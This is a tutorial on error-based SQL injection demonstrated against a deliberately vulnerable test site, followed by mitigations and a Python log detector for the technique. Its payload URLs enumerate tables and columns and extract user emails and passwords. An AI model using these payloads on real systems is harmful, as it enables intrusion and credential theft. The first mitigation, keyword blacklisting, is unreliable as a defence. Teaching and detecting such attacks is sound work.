Error Based SQL Injection

Here is my new write-up on Error Based SQL Injection.

Generally we perform error based SQL injection on ASP or ASPX websites. It is similar to PHP, but the difference is that we do not use queries containing UNION SELECT, ORDER BY, GROUP BY, etc. Instead we trick the server into giving up the information we want: the server returns it to us inside an error message. That's why it is called Error Based SQL Injection. :)

Here is an example....

Target URL:- http://testasp.vulnweb.com/showforum.asp?id=1

As I previously described, first we need to check whether the application is vulnerable. To do this we insert a quote ('), which breaks the query and generates an error. Here it is....

http://testasp.vulnweb.com/showforum.asp?id=1'


After generating the error we need to patch it; to do this we use (--+) to comment out the rest of the query.

http://testasp.vulnweb.com/showforum.asp?id=1--+

In error based SQL injection we don't need to find the number of columns; we directly extract the table names and column names.

First we look for current user :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select current_user))--+  


Here the server tries to convert the result of the subquery into an integer. Because the value is a string the conversion fails, and the error message generated is exactly what we want, since it carries the value.

Version details :-   

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select @@version))--+

Database Name :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select db_name()))--+



Table Name :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select top 1 table_name from information_schema.tables))--+


Here TOP 1 extracts the table name that comes first in the database.

To extract the second table name we use NOT IN.

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads')))--+

Extract the third table name, and so on....

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users')))--+

All tables (every table found so far in the NOT IN list) :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users','forums','posts')))--+

Now we extract the column names :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--+


All column names :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname','upass','email','realname','avatar')))--+


After finding the table name and column names we extract the email and password.

For email :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 email from users))


For Password :-

http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 upass from users))


Mitigations :-

1- Implement a check for SQL keywords (e.g. SELECT, UNION, NOT IN) and bad characters (e.g. !#$%&'*+-/=?^_`{|}~@[]). If the request contains any bad keywords/characters, do not proceed with the request. Note: this has to be done on the application side, before the request reaches the database.

2- Use stored procedures or prepared statements. This ensures the attacker cannot modify the intent of the query.

3- Disable features and services which are unnecessary for operations.

4- Run the database and any applications querying the database with the lowest possible privileges.

5- Stay up to date with vendor patches after they have been thoroughly tested within your environment.
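As an added example (not part of this write-up), here is a small Python detector that applies the keyword idea from mitigation 1 to web server logs instead of the live request: it runs the signatures of the technique above (convert(int, ...), information_schema, @@version, the --+ tail) over a few constructed IIS-style log lines and picks out clients that are enumerating. The log lines, their field layout and the signature list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines: date time c-ip cs-uri-stem cs-uri-query sc-status.
# Sample input made up for this example, not taken from any real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 /showforum.asp id=1 200
2024-01-01 10:00:07 203.0.113.5 /showforum.asp id=1' 500
2024-01-01 10:00:12 203.0.113.5 /showforum.asp id=1+and+1%3Dconvert(int,(select+@@version))--+ 500
2024-01-01 10:00:20 203.0.113.5 /showforum.asp id=1+and+1%3Dconvert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('threads')))--+ 500
2024-01-01 10:01:00 198.51.100.9 /showforum.asp id=2 200
"""

# Signatures of the error-based technique: a forced integer cast, the metadata
# views it is wrapped around, server/database identity functions, and a comment tail.
SIGNATURES = [
    ("cast_probe", re.compile(r"\b(convert|cast)\s*\(\s*int", re.I)),
    ("metadata_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("server_info", re.compile(r"@@version|db_name\s*\(|current_user", re.I)),
    ("comment_tail", re.compile(r"--\s*$|/\*")),
]

def classify_query(cs_uri_query: str) -> list[str]:
    """Return the signature names matching a URL-decoded query string."""
    decoded = unquote_plus(cs_uri_query)
    # Decode a second time so one layer of double-encoding does not hide the payload.
    decoded = unquote_plus(decoded)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def flag_log(log_text: str) -> list[dict]:
    """Parse the log and return one record per request that matches any signature."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 5)
        if len(parts) < 6:
            continue  # malformed line, skip rather than crash the detector
        _date, _time, client_ip, stem, query, status = parts
        reasons = classify_query(query)
        if reasons:
            hits.append({"ip": client_ip, "stem": stem, "status": int(status), "reasons": reasons})
    return hits

def suspicious_clients(hits: list[dict], threshold: int = 2) -> set[str]:
    """Clients with at least `threshold` flagged requests, i.e. likely table/column enumeration."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return {ip for ip, n in counts.items() if n >= threshold}
```

The bare quote probe (id=1') is deliberately not a signature, because a lone quote is common in legitimate input; the repeated 500 responses to the convert(int, ...) requests that follow it are the reliable signal, and the technique stops working altogether once the raw database error is no longer echoed to the page.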
